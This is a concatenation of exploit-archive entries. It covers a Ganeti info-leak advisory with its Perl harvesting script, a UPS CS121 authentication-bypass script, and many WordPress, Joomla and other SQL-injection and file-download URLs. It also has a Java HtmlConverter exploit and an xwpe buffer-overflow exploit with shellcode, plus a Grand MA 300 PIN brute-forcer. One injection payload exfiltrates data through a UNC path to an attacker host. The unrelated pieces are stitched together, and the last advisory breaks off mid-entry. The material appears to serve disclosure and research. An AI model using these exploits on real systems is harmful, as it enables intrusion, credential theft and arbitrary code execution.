## Proposed Workarounds by the Security Researcher
At first, I think these steps must be done to improve the security of ganeti:
1/ Forcing the RAPI to listen to 127.0.0.1 instead of 0.0.0.0.
This can be done by adding by default to /etc/default/ganeti:
RAPI_ARGS="-b 127.0.0.1"
Listening to 127.0.0.1 for ganeti-mond is a good step too (it
listens to 0.0.0.0:1815/tcp)
2/ Adding an authentication by default for the RAPI daemon (not only
for writing access but for reading access too)
3/ Filtering the output of the jobs to avoid leaking secrets.
Note that the immediate step is to change the secrets used for DRBD and
to be sure nobody had access to the DRBD blocks, allowing a
compromise of all the VMs.
4/ Disabling SSL renegociation and updating the default ciphers.
A personal note: as deploying a working Ganeti platform is very complicated,
attackers will likely giving up before having a working Ganeti
platform to study :)
## Vendor Response
Update to the latest version of Ganeti.
Read details about mitigation measures here:
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg
## Report Timeline
* Jul 30, 2015 : Pierre Kim sends an email to security@ganeti.org
asking for a GPG key, email bounced
* Jul 30, 2015 : Pierre Kim asks Google Security Team if Ganeti is
elligible to the Google Vulnerability Reward Program
* Jul 30, 2015 : Pierre Kim sends an email to Ganeti Team for a
working security contact
* Jul 30, 2015 : Guido Trotter replies by saying to use
opensource-ganeti@google.com
* Aug 1, 2015: Security@google.com confirms it's out of scope
* Aug 4, 2015: Pierre Kim says the exploits are critical and Ganeti
is widely used by Google
* Aug 11, 2015: Advisories and PoC sent to Google Security Team and
Pierre Kim asks Google Security Team to contact Riseup, as they are
using Ganeti
* Aug 12, 2015: Google Security Team transmitted the information to Ganeti Team
* Aug 20, 2015: Google Security Team is working on the scope and the
impact of the report
* Aug 27, 2015: Google Security Team decided is not within scope of
the VRP program but a research grant is awarded as "Security
improvement efficacy research"
* Aug 28, 2015: Pierre Kims provides information about DRBDv8,
DRBDv9. Pierre Kim asks information about the DoS, the condition for
the rewards and asks if Riseup was contacted
* Sep 10, 2015: Google Security Team confirms they will not contact
Riseup and that they ask "that you act and communicate in good faith,
use your own best judgement, and we'll do everything we can to work
with you to resolve vulnerabilities in a reasonable timeframe"
* Oct 6, 2015: Pierre Kim asks for update about the security patchs
and informs he will contact Riseup
* Oct 6, 2015: Riseup is contacted
* Oct 16, 2015: Google Security Team confirm releases end of October
and asks about CVEs from MITRE. The Ganeti Bug #1135 is created
* Oct 17, 2015: Pierre Kim asks Google to ask MITRE CVE assignments
and proposes to contact CNNVD to get a CNNVD entry
* Oct 17, 2015: Google Security Team contacted MITRE to get CVEs
* Oct 23, 2015: Google Security Team has 2 CVE: CVE-2015-7944 and CVE-2015-7945
* Nov 3, 2015: Pierre Kim informs new security with a DoS with the
jobs creation
* Nov 5, 2015: Ganeti Team has rate-limit to 20 concurrent jobs
creation, which limit the problems and declares the patch will be very
soon
* Nov 17, 2015: Ganeti Team announces new releases next week
* Nov 23, 2015: a pre-advisory is sent to Ganeti Team and Google Security Team
* Dec 30, 2015: Ganeti Team releases a security advisory
* Jan 05, 2015: A public advisory is sent to security mailing lists
## Credit
These vulnerabilities were found by Pierre Kim (@PierreKimSec).
## Greetings
Big thanks to my friends Alexandre Torres, Jordan, Jerome and Stephen.
Thanks to Google Security Team which coordinated the issues by
contacting MITRE and the different parties.
## References
https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
http://www.ocert.org/advisories/ocert-2015-012.html
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg
## PoC - GHETTO-BLASTER
=end
#!/usr/bin/perl -w
use LWP::UserAgent;
use JSON;
use Data::Dumper;
use strict;
use warnings;
my $i_want_readable_json = 1;
if (!(defined($ARGV[0])))
{
print "$0 http://<ip_of_ganeti_rapi>\n\n";
print " Example:\n";
print " https://<ip>\n";
} else {
print "GHETTO-BLASTER - a Ganeti data agregation tool\n";
}
print "\n";
print " 2015 Pierre Kim <pierre.kim.sec\@gmail.com>\n";
print " \@PierreKimSec https://pierrekim.github.io/\n";
print " DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE <http://www.wtfpl.net/txt/copying/>\n\n";
exit (1) if (!(defined($ARGV[0])));
my $base_url = $ARGV[0];
my $default_rapi_port = 5080;
my $default_mond_port = 1815;
my %basic_cmds = (
"info" => { "url" => "/2/info", "output_file" => "2-info", "is_json" => 1 },
"version" => { "url" => "/version", "output_file" => "version", "is_json" => 0 },
"features" => { "url" => "/2/features", "output_file" => "2-features", "is_json" => 1 },
"os" => { "url" => "/2/os", "output_file" => "2-os", "is_json" => 0 }
);
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
# FIXME:
# /2/filters
# /2/filters?bulk=1
# /2/groups/tags
# /2/instances/[instance_name]/tags
# /2/nodes/tags
# /2/tags
# /2/networks/[network_name]/tags
#
# TO TEST:
# /2/groups/[group_name]
# /2/networks/[network_name]
&main();
sub main()
{
&greetings("You are being visited by GHETTO-BLASTER a Ganeti data agregation tool");
for my $cmd (keys %basic_cmds)
{
my $res = &get_target($base_url . ":" . $default_rapi_port . $basic_cmds{$cmd}->{"url"});
&save_data_leak($res, $basic_cmds{$cmd}->{"output_file"}, $basic_cmds{$cmd}->{"is_json"});
}
&parse_instances();
&parse_networks();
&parse_groups();
&parse_nodes();
&parse_mond();
&parse_jobs();
&greetings("Thank you for using Ganeti and have a nice day!");
}
sub greetings()
{
my $msg = $_[0];
$msg =~ s/ /_/g;
print "Sending Banner to the remote API Daemon: $msg\n";
my $res = &get_target($base_url . ":" . $default_rapi_port . "/" . $msg, 1);
}
sub parse_mond()
{
my $res;
my $base_url_http = $base_url;
$base_url_http =~ s/https/http/;
$res = &get_target($base_url_http . ":" . $default_mond_port . "/1/list/collectors");
&save_data_leak($res, "1-list-collectors", 0);
$res = &get_target($base_url_http . ":" . $default_mond_port . "/1/report/all");
&save_data_leak($res, "1-report-all", 0);
}
sub parse_instances()
{
my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/instances");
my $decoded_json = JSON::decode_json($res);
&save_data_leak($res, "2-instances", 1);
foreach my $data (@{$decoded_json})
{
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
&save_data_leak($res, "2-instances-$data->{'id'}", 1, $data->{'id'});
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/info");
print "Sleep (10) because job is in progress ...\n";
sleep 10; # we need to sleep(10) when asking the instances/info due to the creation of a job
$res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $res);
&save_data_leak($res, "2-instances-$data->{'id'}-info-jobs", 1, "2/instances/$data->{'id'}/info-jobs");
}
}
sub parse_networks()
{
my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/networks");
my $decoded_json = JSON::decode_json($res);
&save_data_leak($res, "2-networks", 1);
foreach my $data (@{$decoded_json})
{
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
&save_data_leak($res, "2-networks-$data->{'name'}", 1, $data->{'uri'});
}
}
sub parse_groups()
{
my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/groups");
my $decoded_json = JSON::decode_json($res);
&save_data_leak($res, "2-groups", 1);
foreach my $data (@{$decoded_json})
{
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
&save_data_leak($res, "2-groups-$data->{'name'}", 1, $data->{'uri'});
}
}
sub parse_nodes()
{
my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/nodes");
my $decoded_json = JSON::decode_json($res);
&save_data_leak($res, "2-nodes", 1);
foreach my $data (@{$decoded_json})
{
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
&save_data_leak($res, "2-nodes-$data->{'id'}", 1, $data->{'id'});
$res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/role");
&save_data_leak($res, "2-nodes-$data->{'id'}-role", 0, "nodes/$data->{'id'}-role");
}
}
sub parse_jobs()
{
my $total_jobs = 0;
my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs");
my $decoded_json = JSON::decode_json($res);
&save_data_leak($res, "2-jobs", 1);
foreach my $data (@{$decoded_json})
{
$total_jobs = $data->{'id'} if ($data->{'id'} > $total_jobs);
}
for my $i (0 .. $total_jobs)
{
$res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $i);
&save_data_leak($res, "2-jobs-$i", 1);
}
}
sub save_data_leak()
{
my $input = $_[0];
my $output_file = $_[1];
my $is_json = $_[2];
my $stdout = $_[3] || $output_file;
my $json;
print "Parsing $stdout ... saving to $output_file\n";
$input = Dumper(JSON::decode_json($input)) if ($i_want_readable_json && $is_json);
open (FILE, ">", "$output_file");
print FILE ($input);
close (FILE);
}
sub get_target()
{
my $target = $_[0];
my $error_ok = $_[1];
my ($ua, $res, $req);
$ua = LWP::UserAgent->new(
ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 }
);
$ua->agent("Ganeti/2.12");
$ua->env_proxy;
$ua->timeout(10);
$req = new HTTP::Request GET => $target;
$res = $ua->request($req);
print "Error when requesting $target\n" if (!$res->is_success && !$error_ok);
return ($res->content);
}
=begin
## Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
--
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
=end
source: https://www.securityfocus.com/bid/67438/info
UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service.
#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;
$socket = IO::Socket::INET->new( PeerPort => 4000,
PeerAddr => $ARGV[0],
Type => SOCK_DGRAM,
Proto => 'udp');
$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";
$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";
print "Searching login\n" ;
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");
while($socket->recv($inline, MAXBYTES)) {
if($inline =~ /admin/ig) { print $inline; exit; }
}
sleep(1);
source: https://www.securityfocus.com/bid/67442/info
CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection]
source: https://www.securityfocus.com/bid/67460/info
Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Glossaire 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION]
source: https://www.securityfocus.com/bid/67465/info
SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1
source: https://www.securityfocus.com/bid/69278/info
WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected.
www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
source: https://www.securityfocus.com/bid/69089/info
The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
wpSS 0.62 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
source: https://www.securityfocus.com/bid/69105/info
The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HDW Player 2.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12
source: https://www.securityfocus.com/bid/69109/info
VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg
source: https://www.securityfocus.com/bid/69181/info
The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected.
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close
action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
Exploit via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql
---
Place: POST
Parameter: selected_group
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
source: https://www.securityfocus.com/bid/69222/info
FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
Vendor:
===============
www.oracle.com
Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50
The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.
Vulnerability Type:
============================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.
Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
registers ...
EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252 <-------- "RRRR" \x52
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
Exploit code(s):
===============
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
#EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)
Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Description:
=============================================================
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe
=============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290 + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290 + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFF370 EIP:
0x42434441
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while
running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0 0x42434441 in ?? ()
#1 0x4f4e2041 in ?? ()
#2 0x61732054 in ?? ()
#3 0x21646576 in ?? ()
#4 0x206f440a in ?? ()
#5 0x20756f79 in ?? ()
#6 0x746e6177 in ?? ()
#7 0x206f7420 in ?? ()
#8 0x65766173 in ?? ()
#9 0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()iles ESC-F3 Close W. F4 Search ^L S.Again ESC-X
Quit
#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()
import os,subprocess
def run():
try:
print "# xwpe Buffer Overflow by Juan Sacco"
print "# It's AGAIN Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*262
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*124
eip = "\x50\xd1\xff\xbf"
subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, xwpe not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit xWPE Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
source: https://www.securityfocus.com/bid/69387/info
The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
source: https://www.securityfocus.com/bid/69422/info
Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
source: https://www.securityfocus.com/bid/69390/info
Grand MA 300 is prone to multiple security weaknesses.
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
Grand MA 300 running firmware version 6.60 is vulnerable.
#!/usr/bin/perl
#
# This brute-forces the pin of a Grand MA 300 Fingerprint
# Access device in less than 5 minutes, if the pin
# is between 1 and 4294967296.
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use IO::Socket::INET;
use strict;
use warnings;
sub hexd {
my ($data) = @_;
my $ret = "";
for (my $i=0; $i<length($data); $i++) {
$ret .= sprintf "%X", ord(substr($data, $i, 1));
}
return $ret;
}
sub getword {
my ($data, $offset) = @_;
my $ret = 0;
$ret = ord(substr($data, $offset, 1));
$ret += 0x100 * ord(substr($data, $offset+1, 1));
return $ret;
}
sub makeword {
my ($value) = @_;
my $ret = chr(($value & 0xFF)) . chr((($value >> 8) & 0xFF));
return $ret;
}
sub calccrc {
my ($packet) = @_;
# we pad with zero for packets of uneven length
my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
my $crc = 0;
# the crc is the sum of all words in the packet
for (my $i = 0; $i<length($packet) - 2; $i += 2) {
$crc += getword($newpacket, $i);
}
# if the result is to big, we add the high bits to the lower bits
while ($crc > 0xFFFF) {
$crc = ($crc & 0xFFFF) + ($crc >> 0x10);
}
# negate the checksum
$crc = ~$crc & 0xFFFF;
return $crc;
}
sub makepacket {
my ($type, $cid, $seqno, $data) = @_;
my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
}
sub calcpass {
my ($pin, $cid) = @_;
my $ret = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
$ret *= 2;
if ($pin & 1) {
$ret = $ret + 1;
}
$pin = $pin / 2;
}
$ret += $cid;
# xor with magic value
$ret ^= 0x4F534B5A;
# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
# xor all, but third byte with last byte of gettickcount
my $gc = 0x00;
$ret ^= $gc + ($gc << 8) + ($gc << 24);
# set third byte to last byte of gettickcount
# this weakens the algorithm even further, since this byte
# is no longer relevant to the algorithm
$ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
return $ret;
}
# flush after every write
local $| = 1;
my ($socket,$client_socket);
# creating object interface of IO::Socket::INET modules which internally creates
# socket, binds and connects to the TCP server running on the specific port.
my $data;
$socket = new IO::Socket::INET (
PeerHost => '192.168.1.201', # CHANGEME
PeerPort => '4370',
Proto => 'udp',
) or die "ERROR in Socket Creation : $!\n";
# initialize the connection
$socket->send(makepacket(1000, 0, 0, ""));
$socket->recv($data, 1024);
my $typ = getword($data, 0);
my $cid = getword($data, 4);
if ($typ != 2005) {
printf("Client does not need a password");
exit(-1);
}
for (my $i = 0; $i < 65536; $i++) {
if (($i % 10) == 0) { printf "$i\n"; }
my $pass = calcpass($i, $cid);
$socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));
$socket->recv($data, 1024);
$typ = getword($data, 0);
if ($typ == 2000) {
printf("Found pin: %d\n", $i);
exit(0);
}
}
# disconnect
$socket->send(makepacket(1001, $cid, 2, ""));
$socket->close();
source: https://www.securityfocus.com/bid/69390/info
Grand MA 300 is prone to multiple security weaknesses.
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
Grand MA 300 running firmware version 6.60 is vulnerable.
#!/usr/bin/perl
#
# This script calculates the original pin based on the pin
# retrieved on the wire for the Grand MA 300 fingerprint access device
#
# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
# encoded pin
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use warnings;
use strict;
my $cid = 0; # connection id
my $ret = 0x4B00A987; # pin on the wire
# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;
# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
$ret = $ret | 0x005A0000;
# xor all, but third byte with last byte of gettickcount
$ret ^= $gc + ($gc << 8) + ($gc << 24);
# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
# xor with magic value
$ret ^= 0x4F534B5A;
# substract the connection id
$ret -= $cid;
my $fin = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
$fin *= 2;
if ($ret & 1) {
$fin = $fin + 1;
}
$ret = $ret / 2;
}
printf("final: %X \n", $fin);
source: https://www.securityfocus.com/bid/69307/info
ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ArticleFR 3.0.4 is vulnerable; prior versions may also be affected.
http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
source: https://www.securityfocus.com/bid/69303/info
ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following products are affected:
ManageEngine Password Manager Pro 5 through 7 build 7003
ManageEngine IT360 8 through 10.1.1 build 10110
www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]
>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015
>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.
>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.
#1
Vulnerability:
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996
Affected products / versions:
